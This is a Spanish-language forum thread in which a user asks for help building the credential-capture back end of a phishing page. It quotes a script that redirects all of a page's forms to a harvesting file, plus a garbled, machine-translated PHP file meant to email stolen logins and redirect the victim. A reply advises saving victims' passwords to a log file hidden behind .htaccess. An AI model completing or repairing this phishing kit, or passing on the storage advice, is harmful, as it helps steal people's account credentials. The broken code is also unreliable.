Ayuda con ingeniería social.

Iniciado por inmine, Marzo 15, 2018, 01:04:54 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Marzo 15, 2018, 01:04:54 PM Ultima modificación: Marzo 15, 2018, 11:01:46 PM por Gabriela
Hola Quisiera saber cómo se crea el código que  es donde obtiene el inicio de sesión enviado por correo electrónico de un PHISHING

Ejemplo: Código:
<script>
var x; for (x en document.forms) {void (document.forms
  • .action = "process.php")};
    </ script>
    Ahora hay dos formas de escribir el archivo de proceso. El primero es donde obtiene el inicio de sesión enviado por correo electrónico (Parte1), en segundo lugar es donde se registra su inicio de sesión en un documento de texto (Parte 2).

    Parte 1.

    Que guardar Ahora tenemos nuestra página de inicio de sesión, el primer archivo del inicio de sesión falso, ahora necesitamos nuestro archivo de proceso. Abra el Bloc de notas, y luego copie y pegue el siguiente código en su interior.

    Código:
    <? php
    = "POST DATAn --------------------------------- n";
    registro de función (,) {global; . =. "=" .. "n"; }
    array_walk (Array, "log");
    correo (" No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ", "Fake Login",);
    encabezado ("Ubicación: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta");
    ?>


    Lo malo que este código no me funciona. ???

Podrías comenzar estudiando Javascript, sabiendo hacer un hola mundo, posterior aprendiendo a programar PHP, no es necesario recibir los datos ingresados por la vícitma por email, pues requerirías configurar el servidor SMTP en el servidor en donde haz montado la página de phising, no es mejor almacenar la clave en un .log o .txt y denegar el acceso frente a curiosos o robots por medio de directivas dentro de un archivo .htaccess?

Saludos